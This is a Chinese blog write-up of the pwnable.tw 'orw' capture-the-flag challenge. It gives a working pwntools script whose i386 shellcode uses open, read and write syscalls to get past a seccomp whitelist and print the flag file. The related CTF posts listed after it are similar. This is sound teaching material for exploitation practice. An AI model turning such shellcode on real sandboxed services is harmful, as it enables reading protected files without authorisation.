Pwnable.tw orw [Writeup]

已于 2023-01-25 17:23:35 修改
阅读量586 收藏
点赞数
分类专栏: pwn 文章标签: pwn
于 2021-02-18 23:04:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43483799/article/details/113854997
版权

题源

https://pwnable.tw/challenge/#2

在这里插入图片描述

题解

先看一下安全保护情况

在这里插入图片描述

再IDA一下源码

在这里插入图片描述

其中seccomp是一个开启内核system call保护的函数。通过这一函数可以划定程序准许用户态调用的系统函数,相当于划定白名单,即题目所言【仅开启了open、write、read】。

简单分析函数可知,该程序直接执行了用户输入的shellcode。结合题目意思,可以使用open函数打开flag文件,然后read读出文件内容,最后write输出到控制台。

使用的python程序如下:

from pwn import *
context(arch='i386',os='linux')
#context(log_level='debug')
io = remote('chall.pwnable.tw',10001)
open_code = '''
mov eax, 0x5; 
push 0x00006761; 
push 0x6c662f77; 
push 0x726f2f65; 
push 0x6d6f682f; 
mov ebx,esp; 
xor ecx,ecx; 
xor edx,edx; 
int 0x80;
'''
read_code = '''
mov ecx, ebx; 
mov ebx, eax;
mov eax, 0x3; 
mov edx, 0x60; 
int 0x80;
'''
write_code = '''
mov eax, 0x4; 
mov ebx, 0x1; 
int 0x80;
'''
payload = asm(open_code+read_code+write_code)
io.recvuntil(':')
io.send(payload)
io.interactive()

"""
import binascii
b = list(r'/home/orw/flag')
b.reverse()
a = ''.join(b)
print(binascii.hexlify(a.encode()))
->b'67616c662f77726f2f656d6f682f'
"""

需要注意的几个细节:

  • line7-10:字符串的压栈方式比较特殊,见总结处的分析
  • line11:使用压栈结束后的esp直接作为ebx值,作为文件名指针
  • line17:直接把原来的文件名指针当做read使用的缓冲区指针了
  • line18:open函数结束后返回最小的未被使用的文件描述符,存放在eax中,这一值也是read中ebx所需要的
  • line20:随便指定了一个缓冲区长度,只要大于flag长度即可
  • line25:标准输出使用的文件描述符为1

运行结果:

在这里插入图片描述

总结

本题的exploit难度不高,重点在于找好思路。dump看汇编代码时一堆一堆极其繁琐,但不需要精读其内容。这一题直接看反编译结果,seccomp通过搜索了解函数功能即可。在观察到直接执行用户输入的shellcode后,直接调用system函数。通过本题应该学会:

  • sys_open、sys_write、sys_read三个函数的传参方式、参数意义
  • 字符串入栈细节:先四字节对齐、补零,然后从后向前每4个字节一次push
  • 使用python的binascii.hexlify可以快速将字符串转为十六进制

参考资料

  1. seccomp相关说明
  2. linux/x86 32bit系统调用表
c01dkit
关注
专栏目录
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1708
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
pwnable.tw orw writeup
jmp esp
09-27 1924
题目题目比较简单就不复制了,首先seccomp设置了白名单,然后输入0xc8长度shellcode,直接跳到shellcode执行。分析既然是练习,就要彻底一点。 首先是seccomp dump的问题,目前采用的方法是IDApython脚本dump数据下来,然后输入scmp_bpf_disasm。IDApython的文档非常诡异,函数没有说明,函数的参数也不能直接看出来,所以搜了很长时间找了一个别
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1582
pwnable.tworw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
pwnable_orw
K1ose的博客
04-23 420
file orw; 32位程序; checksec; IDA pro分析; main函数下可直接执行shellcode; 但是存在沙箱,只能执行open、read、write等几个系统函数; seccomp-tools dump ./orw 显示允许使用的系统调用函数; 这里想的是: open('/flag') read(3,buf,0x66) #这里3是因为一般stdin、stdout、stderr占用了0,1,2; write(1,buf,0x66) #这里1为标准输出; buf可读可写; 这
pwnable.tw writeup
钞sir的博客
02-27 4095
start 这道题是静态编译的,或者可以理解是就是直接用汇编写的,所以这个程序很小,没有可以利用的函数; sir@sir-PC:~/desktop$ objdump -R start start: 文件格式 elf32-i386 objdump: start:不是动态对象 objdump: start: 无效的操作 反汇编代码: sir@sir-PC:~/desktop$ objdu...
pwnable.tw 1~5 心累
qq_42192672的博客
12-02 654
听说很难,来找虐 1.Start [100 pts] 之前湖湘杯有一题啥防护措施都没开启,我就不会做,所以不敢开心的太早 拖进IDA,这啥东西 还是直接看汇编吧 这是个系统调用 大概就是系统中断之后直接调用吧,边上有注释,不然我直接凉了 来,看一下汇编 先把地址给ecx,给了给长度范围,饭后执行标准输出,输出到终端,然后执行写操作 进入写函数以后,标准读入,长度还是2...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 294
BUUCTF 做题练习
BUUCTF pwnable_orw
weixin_45441024的博客
05-10 401
BUUCTF pwnable_orw 好久不更新博客了,在不更新显得好像自己真的瘦到95斤了似的,上题! 1)还是一如既往地check一下,可以看到程序开启了canary防护,其他的防护并未开启 2)运行一下这个程序,大概了解一下它的运行效果 3)分析这个函数,发现调用了两次prctl,这里决定了程序只能调用open,read,write函数,那我们就必须利用有限的条件来执行,这里有两种写法 ①手动添加汇编代码进行构造 #!/usr/bin/python2 #coding=utf-8 from pwn
2021-鹏城实验室网络安全技能大赛-pwn-babyheap 题解
lifanxin的博客
09-28 2512
Write Up文件信息漏洞定位利用分析WP总结 文件信息   本题来自于2021年的鹏程杯比赛的pwn题,题目链接如下:2021-鹏程杯-pwn-babyheap。   该题目主要考查了libc-2.29.so及以上版本的off-by-null利用方式,本题目使用的是libc-2.31.so,知识点学习推荐博客glibc2.29下的off-by-null。同时作为堆题,保护全开,没有可用的show功能函数,必须使用IO_FILE来leak libc,知识点学习推荐博客pwn题堆利用的一些姿势 – IO_F
pwnable.tw-orw
qq_35661990的博客
10-27 477
Read the flag from /home/orw/flag. Only open read write syscall are allowed to use. nc chall.pwnable.tw 10001 这是pwnable.tw orw的题目描述,只能用syscall只能用open、read、write 从ida看源代码 int __cdecl main(int ar...
Pwnable
03-26
Pwnable
pwnable.tw - orw
不急不躁
07-09 3069
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
pwnable.tw calc writeup
jmp esp
09-27 1683
题目main:int __cdecl main(int argc, const char **argv, const char **envp) { ssignal(14, timeout); alarm(60); puts("=== Welcome to SECPROG calculator ==="); fflush(stdout); calc(); return puts
pwnable.tw start writeup
jmp esp
09-27 1501
题目.text:08048060 .text:08048060 public _start .text:08048060 _start proc near .text:08048060 push esp .text:08048061 push offset _exit .te
pwnable tw Death Note writeup
charlie_heng的专栏
03-01 1118
pwnable tw的题做到后面越来越骚了……脑洞太大… 这题其实是printable shellcode 一开始完全没思路,后面搜了下,发现了一个神器 https://github.com/VincentDary/PolyAsciiShellGen 能将shellcode转化为可打印字符 看了下生成的shellcode,发现其实它是利用 sub eax,xxxx 来将eax设置为任意值,...
pwnable tw Starbound writeup
charlie_heng的专栏
03-02 955
这题漏洞很明显,选择菜单的时候可以输入负数,然后可以在name那里填入想调用的函数,这样就可以实现任意地址执行 但是有了这个之后怎么用呢?? 这个就有点难度了,本来是想看一下栈,看看有没有可以用的参数,但是发现基本都用不了……. 然后想了下,这题没有给libc,又没有system,那么多半是ret2dl_resolve 那么ret2dl_resolve又需要rop,那么这题应该就是rop了...
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1482
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
return orw();
最新发布
12-19
return orw()是一个函数调用表达式,它会调用名为orw()的函数,并将函数的返回值作为整个表达式的值返回。 在这个表达式中,orw()表示一个被定义的函数。函数调用的一般形式是函数名后跟一对括号,括号中可以包含...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

c01dkit

好可怜一博主,都没人打赏>_<

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值